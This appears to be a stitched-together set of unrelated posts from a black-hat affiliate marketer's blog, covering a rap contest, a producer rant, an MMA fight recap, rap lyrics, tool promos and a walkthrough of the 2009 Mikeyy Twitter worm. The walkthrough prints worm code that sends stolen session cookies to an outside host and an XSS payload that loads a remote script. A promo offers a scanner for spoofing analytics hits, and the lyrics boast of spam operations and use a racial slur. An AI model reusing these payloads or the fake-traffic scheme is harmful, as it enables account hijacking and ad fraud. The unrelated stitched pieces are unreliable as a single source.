Rob Hustle! Congratulations!

Every single one of the judges who responded had Rob as their first place vote. Rob’s entry really stood out because he not only told the ShoeMoney Story of how I started but also mentioned all the key selling points of the ShoeMoney System. The hook (chorus) is off the charts but the real thing that got us was the “haters gonna hate” graphic during the hook. Which anyone who has achieved any success on the internet can relate to.

Mix that in with a awesome production and… you have your winner. We like it so much we use it for our ringtone around the office.

Here you can download the iPhone version (just put it in iTunes) and the MP3 version for blackberry and android.

We have also made a new radio ad with Rob’s hook that will start to replace our current national ads next week.

RULE NUMBER ONE: FUCK YOUR INTRO
Don’t make the intro 30 seconds long. NO ONE WILL LISTEN TO THAT SHIT. I don’t want to wait 30 goddamn seconds till I can bust my rhyme. What am I supposed to do, sit around talking shit and saying YO?

Rookie Producers are like primadonnas… they want everyone to see how dope they are, so the add instrumentation one layer at a time. The hi hat. The snare. The kick. FUCKING STOP IT!

You got 10 seconds max, then drop the fucking beat. Thats why veteran producers get so much hype… they understand this shit.

RULE NUMBER TWO: TOO MUCH SHIT
How is anyone supposed to rap over all that garbage? There’s no place for the vocals to sit. A good beat should sound incomplete without the vocal. Try downloading some of the all time classics. You hear that open space in the middle? That’s where the VOCALS SIT. Stop crowding the lane and pass the rock already.

RULE NUMBER THREE: DROP THE BEAT ALREADY
All that fancy intro shit and then the beat drops and… NOTHING. ARGH! I WANT TO KILL YOU! If your beat doesn’t drop, then no one is going to rap on it. Why is it that some producers have tons of people spitting on their shit, while others are begging people to lace up a track? If that sounds like you, here’s a clue: Your Beat Doesn’t Drop.

I’m sick of wack producers ruining otherwise good tracks with these stupid mistakes. Just cut the bullshit, drop the beat, and lets do this.

I remember when he went pro… I remember him dismantling heavyweights in brutal fashion. His knockout of Morrison was one of the most awesome destructions of a heavyweight ever. Morrison was trying to fall and Mercer literally lifted him up back up with punches, preventing him from hitting the mat.

Along with his punishing style, I liked Mercer’s attitude. He seemed like a straight up guy. I like the military. I grew up on military bases. I hung around with military people. He wasn’t for everyone, but I was comfortable with his blue collar style.

Fast forward to 2009.

Times aren’t always easy for an aging heavyweight champ. Mercer had already suffered one humliating loss to Kevin “Kimbo” Ferguson. Although he and Kimbo had agreed to step in the cage and trade punches, as soon as the bell rang, Kimbo immediately tried to take Mercer down. One of the last things to go on a heavyweight is his power. You can get old as fuck, but if you are a boxer who can punch, that punch will stay with you till the end.

Unfortunately, Mercer never got the chance. Kimbo took him down, beat him on the ground, and in the minds of most, Ray’s legacy as an MMA can was begun.

Enter Tim “Tastes like pee pee” Sylvia.

Following a series of boring fights and a knockout loss to Fedor, the former UFC Heavyweight champion decides that he is going to pursue a career in Boxing. Apparently, Tim doesn’t understand that the level of hands in Boxing is exponentially greater than anything that he’s ever seen in MMA.

MMA striking is completely different than boxing. In MMA, the threat of a takedown completely alters the way you throw strikes. The threat of a kick changes how you attack. The ability to defend takedowns and kicks makes MMA striking a different sport altogether. Unfortunately, Big Tim drank the kool aid that MMA > Boxing, therefore, he could enter the world of Boxing and do some damage.

As Tim would soon find out, you don’t drink kool aid in front of Ray Mercer and not offer him some.

Enter the press conference. No one ever accused Tim of being a smart man, but you don’t have to be an asshole. He says, “It’s no secret that I’m going to use Ray Mercer as a stepping stone.” Seriously? First off, Ray is 48 years old, and you are 33. Talking shit to the elderly is not cool. Not showing respect for a former champ is not cool. And not showing respect to an Olympic Gold Medal Winner is not cool.

Mercer has done more than you ever will Tim. You might beat him. But you have every advantage. Show respect. But no, Tim has to play the douche for all its worth. Witness the pre-fight press conference:

Unlike Tim, Jens Pulver knows something about Boxing. With 5 pro fights, Jens has been in the squared circle, and he understands that there are fundamental differences between the two sports. While most of the MMA world (read: the UG) believes that Mercer will be destroyed, a quiet contingent of pro fighters and old school boxing enthusiasts are not so sure… Jens Pulver, always a straight shooter, speaks the truth when asked:

The night of the fight. Sylvia and Mercer have a gentleman’s agreement to just box. Both of them had been expecting a boxing match. Mercer had trained for a boxing match. But two days before the fight, the commission informs the promotion that the fight would be illegal, so they have to change it to MMA.

The warrior that he is, Mercer agrees to the rule change. But, he reaches an agreement with Sylvia that it will be boxing. Of course, Tim doesn’t honor that agreement. As soon as he steps into the cage, he throws a kick. When the video starts, Mercer is looking at him like, ‘WTF BITCH?! You said it was going to be boxing, and now you kicking me like a BIIAATCH?!! OH HELLS NO!!!”

He then proceeds to cut through Tims bitch ass pawing jap and land the overhand RIGHT straight across Timmeh’s JAW. TIIIMMMMMBEEEERRR!!!!

And the best part of it all. The post fight interview. My god, I could watch this over and over. I beat dat ass. I whupped dat ass. I need money… so we knocked that nigga OUT!!!

Merciless Ray Mercer… Legend.

Rob Hustle + Von Doogan - Automatic

Automatic - Paper Clique Allstars

Rob Hustle
what you gonna do with yo life bro
9-5 two kids and a wife bro?
waste days as a wage slave
never get paid
wonder why you seem suicidal?

wonder why you never feel happy?
wonder why you outta control?
wonder why you smile on the outside
while inside you rampage like a psycho?

man i might up and go crazy
if i had a fuckin life like you
if i had a dumb motherfuckin boss
always tryna tell a motherfucker what to do

so just ask yourself this question
who da real g’s be online?
who really be makin that paper,
runnin capers, stayin on that grind?

can’t be no motherufuckin pussy
can’t afford no wastin no time
gotta want to GET that PAYpuh,
gotta have that shit all on your mind

who the fuck oprah be suin?
who the ftc reviewin?
who the texas ag pursuin?
a-game yeah thats how we do it

I flow mo sick than swine flu
there’s really no need to remind you
i dropped these lines that i rhyme to
give you all somethin that you can to grind to

dont neva look back behind you
neva let nobody outshine you
double p c to the bz paper clique
a-game number one top rhyme crew

never find my rhymes up on itunes
never gonna stop tryna bring shine to
all the other motherfuckers in the a-game
gonna keep droppin these ride till i die tunez

i flow so low when i go low
lookin mean gonna lean back like a cholo
pull a 404, call the po po
neva go black like a black hat cat with a co-lo

Von Doogan
What you know about a colo, with a wholesale promo,
pay the shit once with a prepaid, doesn’t even seem bad, let the shit run for 4 mo, months yo. proxo fo sho
My flow is a proto-type, hold the road tight like a pair of low pros.
Me and rob hustle flow so fero-cious, causing comotion, oh no.

Stop, take a deep breath momo, seen fname for a second, cheese, then photo.
My flow is oh so sick, so ridic, flow so vicious, rip
these landers, fire up these spammers, be frightened, greased lightening,
got the berries, got the rezv, got the rebills, got the iq test, got the pro teeth whitenin.

Yeah, screamin fuck the world,
make monies online, you’d love a twirl.
Give ya bitch a spin, I’d pluck ya girl,
one thing i know, it was much deserved.

And we gettin our just rewards, and you know we love dessert,
got the cake and eat it to, weak game we seein thru, mothafuckas think they can’t get weeded too.
But they can, rolled up, spliffed quick,
don’t like my style, suck my dick.
family feuding, the mccoys and hatfields, survey says, you can get ya damn cap peeled.

Off the top, written or not, try to block my shot i’ll stop ya plot.
Cuz i switch it up daily, and firelead is the network that pays me.
Got you in daze, Billy Mays, hitting brick walls left and right, 1 more line of code to write.
1 more garcia left to light. ayo i’m gettin hype!

Yeah, up in the cypher spliffed up, strip club, pimp cup, exotics tip cup,
cuz a gentleman, with a henny handle, can’t stop, when it comes to my goddamn spam op.
Hittin all the big socials, how many triangles in this photo.
oh no, dundadda back in the zone, hustle lit it up, doogan gotta bring the track home.

get money get paid is the first rule right, get bitches get laid, is the second alright.
two rules to live by, doulbe p c dot bz ain’t no kid’s toy, it’s war.
chyeah, bout to close it out, leave ya croaked on the ground wit an open mouth.
Dead on arrival, excited by my live flow, fuck with us, shit i wouldn’t even try to.

and you can catch the swine flu. we homocidal,
me and rob hustle will dust you, any beat ain’t gotta try to rhyme to.
It’s automatic. we throwin nonos. spiced up like adobo,
harder than a bulletproof volvo, gased up like sunoco.

Get it jumpin like a lolo, top to bottom, rip the vocals, oh so loco,
goin global, got the mothafuckin a game in a goddamn choke hold.
Automatic. it’s automatic. causin havoc.
Automatic. it’s automatic, bringin static, yeah!

on our A game, is automatic, in this A game, like a mac. br-r-r-r-t

Just a taste of what went down that night is this incredible battle between Mic Davice and Frank D. Frank D is a local MC that has gotten some shine on the radio. Mic Davice is an affiliate rap game killer representing PPC.BZ.

As you can see, we can do more than just make money. A-game official. PPC.BZ represent!

This scanner will analyze a web site and determine what analytics packages are being run. Then, it will generate the appropriate spoofing code so that you can make it look like someone hit the site.

Rob Hustle would never advocate actually doing something like that, especially in conjunction with a proxy switcher and a massive useragent list. Rob Hustle loves kittens and ponies, and only engages in black hat research to satisfy his intellectual curiousity. Don’t do drugs!

This is my latest Twitter app. If you have to maintain multiple Twitter accounts (work, home, personal), this lets you send tweets to all of them at once. Check the video for info, then click the link to download.

Download Here

As most of you know, the Mikeyy worm and its variants have been infecting Twitter profiles recently. However, many of you might not know exactly how this worm works. This is a quick run down of the source code, in case you are interested.

Note, that this is not a technical run down. I’ve made this in as plain language as possible. So, programmers, cut me some slack I just thought it would be interesting for people to see how this virus actually worked.

Here goes…

*** The Switchboard - How the Virus Communicated with the Twitter Servers ***

The original virus had a few main function. The first was a function called XHConn:

function XHConn() {  … code removed … }

In order for the attack to work, the hacker had to use something called asynchronous javascript and XML, or AJAX for short.  AJAX allows web pages to make calls to a server from your computer.

Back in the day, HTML files were static. You would download them from the web and display them on your computer. Once they were on your computer, they did not change. In order for the web page to change again, you had to click on something.

However, as the web got more advanced, there was a need for the web page to be able to change itself. Developers needed ways to get information from the server based on what the user was doing, without refreshing the page. So, they started creating things like Javascript, which let them make more powerful and functional web sites.

But in order for the javascript to connect to the server, it needed a way to communicate back and forth. There had to be some kind of switch board that would let the web page send commands to the server, and let the server send information back in response.

In the Mikeyy virus, XHConn was the switchboard. It was the function that allowed the virus to send instructions to and receive responses from the Twitter servers.

*** The Code Room - How the Virus Encoded Its Transmissions ***

The next function in the virus was the URLENCODE function:

function urlencode( str ) { … code removed … }

This function was like an encoder box that sat between the swtichboard and the server. The Twitter servers would not respond to transmissions that were not in the proper format. But, the virus needed to send it commands that contained code.

Unlike regular tweets, code has a bunch of special characters. Things like *#$Q#()*@&<>. Some of these characters cannot be sent in a regular URL or understood by servers if they are. In order to transmit the code without causing an error, the virus needed a way to encode it in such a way that the server would understand it.

So, before sending anything to Twitter, the virus would use the urlencode function to encode the transmission. That would ensure that it would arrive safely at the server and be in the proper format when it was received.

*** Getting the Blueprint ***

So far, the worm has not done anything. It has set up its communications switch board, and it has set up an encoder box to use for the transmissions. Now, it gets down to business:

var content = document.documentElement.innerHTML;

This single line does a lot of things. Whenever you are looking at a web page, the page itself is represented by a model. The model has all of the information necessary for your browser to create the page. It’s like the blueprint of a web page.

If the virus has the blueprint, it can then search the page for information. And that is what the line above does. It creates a copy of the web page and stores it in a variable called ‘content’.

*** Locating the User Name ***

Now that the virus has a map of the web page, it has to find the information that it needs. And that information is the USERNAME. If the virus has the username, it can use that to do two things:

1) Send Tweets
2) Infect the profile

To get the username, the first thing it has to do is find it. Thats what this line of code does:

userreg = new RegExp(/<meta content=”(.*)” name=”session-user-screen_name”/g);

This creates something called a REGULAR EXPRESSION.  Now, computers are kind of stupid in a way. If you have ever tried to program one, then you know if you even get one single period, comma, or semi colon wrong, the entire thing blows up. But, sometimes you need to search for things that you don’t exactly know what they are.

Imagine that you are sending your computer to the store to buy milk. Traditionally, you would have to specify EXACTLY what you wanted the computer to get. “Go get organic 1% milk”. But what if the store was out of that exact kind of milk? The computer would throw an error.

With a regular expression, you don’t have to be exact. You can just say, “Buy Milk”, and the computer will go and get the closest thing it can. It gives you more flexibility, and makes it more likely that the comptuer will succeed in its task.

That is what the virus is doing here. It knows it needs to search through the content of the web page to get the user name, so it has created a regular expression to help it find what it is looking for.

In th enext two lines:

var username = userreg.exec(content);
username = username[1];

We see the regular expression put to work. The first line simply tells the computer to search through the content and find anything that matches the regular expression that was set up earlier. The second line takes the match (ie, the user name), and assigns it to a variable called ‘username’. The virus now knows who’s page it is attacking.

Next, the virus does some sneakiness. First, it tries to grab the cookies from the current document:

var cookie;
cookie = urlencode(document.cookie);

Notice how it uses the urlencode function? That is the encoder we discussed earlier. Now, remember, the encoder was used to encode things that need to be transmitted. This is encoding the cookies that it finds. Obviously, it is going to transmit those cookies somewhere.

But where?  And how?

We find out in the next line:

document.write(”<img src=’http://mikeyylolz.uuuq.com/x.php?c=” + cookie + “&username=” + username + “‘>”);

Javascript has a lot of functions that allow a program to modify a web page. One of those functions is called ‘document.write’. The name does what it sounds like - it writes code to a web page.

In this case, what the virus is doing is writing an IMAGE to the web page. Or is it?  We see that there is an image tag there…

<img src=’http://mikeyylolz.uuuq.com/x.php?c=’>

But WAIT!  It is NOT pointing to an image file. Instead, it is pointing to a PHP script. Whats more, it is passing variables to the script in the query string. If we run the document.write function, this is what gets written to the browser:

<img src=’http://mikeyylolz.uuuq.com/x.php?c=” + cookie + “&username=” + username + “‘>

Let’s break that down some more. This is calling a PHP script called x.php:

http://mikeyylolz.uuuq.com/x.php

See the question mark in the image src? That question mark is called the ‘query string’. What it does is allow you to send variables - pieces of information - to a web page. In this case, there are two variables being sent:

c (the cookie)
username (the username)

So, the virus is writing a fake image to the browser and using that to pass information that it stole from the HTML page using a regular expression to a PHP script. All in one line of code. Whew. Got that?

The virus is not done. Now, it creates a real image:

document.write(”<img src=’http://stalkdaily.com/log.gif’>”);

This gif will not only track all of the visitor IP’s, User Agents, and Referrers, it could also be used to… stuff cookies? Do other various and sundry bad things? At any rate, this is a tracking pixel that is being set so the attacker can run metrics on the attack.

Okay, so the virus has created a switch board, set up an encoding box, and used that to transmit all of the information needed for the attack. Time to attack.

The entire attack happens inside of a function called wait(). I will go through this function in a fairly detailed fashion. But, most of the hard stuff is already done. If you followed up to here, you can get through the rest.

*** The Attack Function ***

Here we go… the first lines should look familiar:

1 - var content = document.documentElement.innerHTML;
2 - athreg = new RegExp(/twttr.form_authenticity_token = ‘(.*)’;/g);
3 - var authtoken = authreg.exec(content);
4 - authtoken = authtoken[1];

This is the same pattern that we saw before when the virus got the username. This time, the virus needs to get the authtoken. So, it starts out by getting the blueprint for the web page (1), then creating a regular expression that it can use to search through the web page (2), executing the regular expression (3) and then storing the result in a variable (4).

This is the same exact thing it did before.

This is kind of funny. There is a commented out line of code next:

//alert(authtoken);

This is how the attacker was debugging his code ;)  Alerts are for losres, hahaha, get a real debugger son!  Anyway, lets continue…

The next few lines of code generate a random update to tweet:

1 - var randomUpdate=new Array();
2 - randomUpdate[0]=”Dude, www.StalkDaily.com is awesome. What’s the fuss?”;
3 - randomUpdate[1]=”Join www.StalkDaily.com everyone!”;
4 - randomUpdate[2]=”Woooo, www.StalkDaily.com :)”;
5 - randomUpdate[3]=”Virus!? What? www.StalkDaily.com is legit!”;
6 - randomUpdate[4]=”Wow…www.StalkDaily.com”;
7 - randomUpdate[5]=”@twitter www.StalkDaily.com”;

8 - var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
9 - updateEncode = urlencode(genRand);

Line 1 creates a container that will hold the possible tweets. Lines 2-7 are the tweets themselves. Line 8 randomly picks a tweet from the container. And line 9 encodes the tweet so it can be sent to Twitter.

Now, for the viral load:

1 - var xss = urlencode(’http://www.stalkdaily.com”></a><script src=”http://mikeyylolz.uuuq.com/x.js”></script><a ‘);

This line encodes the exploit in a variable called xss. There is much sneakiness going on here. Let’s go slowly past it to see what happens.

A normal HTML link looks like this:

<a href=”URL VALUE”>LINK TEXT</a>

It has three parts. First, it is wrapped in an anchor tag:  <a></a>

The anchor tag itself usually has an attribute called HREF. This is the URL that you go to when someone clicks the link. That looks like this:

<a href=”http://your.url.com”></a>

The last element is the link text. The link text is what people click on. So, when we see the HTML code for an anchor, we can see the three parts:

<a href=”URL VALUE”>LINK TEXT</a>

Anchor tag, URL, and LINK TEXT. Got it?

Okay. Now, sometimes, programs will insert values for the URL and Link text for you. And, they will do this automatically. To do that, they will just switch the values for the URL and the LINK TEXT. And, to make that easy, they usually have a template, like this:

<a href=”#URL#”>#LINK NAME#</a>

When the computer sees that template, it says, “I need to replace the #URL# value with a real url, and I need to replace the #LINK# value with a real link name. Suppose that the url was

http://www.robhustle.com

and the link name was

gxd5

Then, this:

<a href=”#URL#”>#LINK NAME#</a>

Would become this:

<a href=”http://www.robhustle.com”>gxd5</a>

Got it?  Okay, now for the attack.  Suppose that instead of using ‘http://www.robhustle.com’ for the #URL# value, we used the XSS value that the virus uses. Just so you remember, it is this:

http://www.stalkdaily.com”></a><script src=”http://mikeyylolz.uuuq.com/x.js”></script><a

Now, this is the way the code would look:

<a href=”http://www.stalkdaily.com”></a><script src=”http://mikeyylolz.uuuq.com/x.js”></script><a “”>gxd5</a>

Do you see what they did?

They closed the original anchor tag!  Then, they inserted a script tag that downloads the virus code onto the browser that is currently watching the page!  This is how YOU get infected when you look at an infected page.

The virus payload downloads onto your computer as soon as you look at the page.

BUT… you HAVE to be logged in to twitter for this to work. Fortunately for the virus, since it is a twitter based virus, most of you already are logged in. So, the exploit works.

Now that the code is there, what will it do?

1 - var ajaxConn = new XHConn();
2 - ajaxConn.connect(”/status/update”, “POST”, “authenticity_token=”+authtoken+”&status=”+updateEncode+”&tab=home&update=update”);

Line 1 - Remember XHConn?  That is the switchboard. The virus is getting ready to send a command to the server.

Line 2 - The command gets sent. It is ’status/update’… this is how a tweet gets sent. Notice that it is using the authotken it grabbed and the randomly generated and encoded status that it pulled. This is where that information finally gets used.

3 - var ajaxConn1 = new XHConn();
4 - ajaxConn1.connect(”/account/settings”, “POST”, “authenticity_token=”+authtoken+”&user[url]=”+xss+”&tab=home&update=update”);

Line 3 - Another connection is created.
Line 4 - This is the core of the virus reproduction. This changes your ‘account/settings’ user url, and changes it to the exploit url above. Instead of:

<a href=”http://www.robhustle.com”>gxd5</a>

You would have something like this:

<a href=”http://www.stalkdaily.com”></a><script src=”http://mikeyylolz.uuuq.com/x.js”></script><a “”>gxd5</a>

And that would infect everyone who looked at your profile.

The final line of code is here:

setTimeout(”wait()”,3250);

This is the ticking time bomb. That code sets a timer that will wait 3,250 milliseconds before executing the code in the wait() function and letting the virus loose.

Variants of this virus are already springing up, but they are all using similar vectors. You would have thought that Twitter would have plugged ALL the holes the first go round. But, maybe they didn’t understand how the virus worked.

Hopefully, they have accounts here 

I wasn’t planning to write a post THIS long, but things like this are interesting to me, and I hope that this was entertaining and informative for you as well.

Are you tired of people ripping off your landing pages? Do you want to stop code thieves from stealing your content? You need…

THE JAVASCRIPT HAND GRENADE

Don’t sit back and let people just rip you off. FRAG THOSE FOOLS!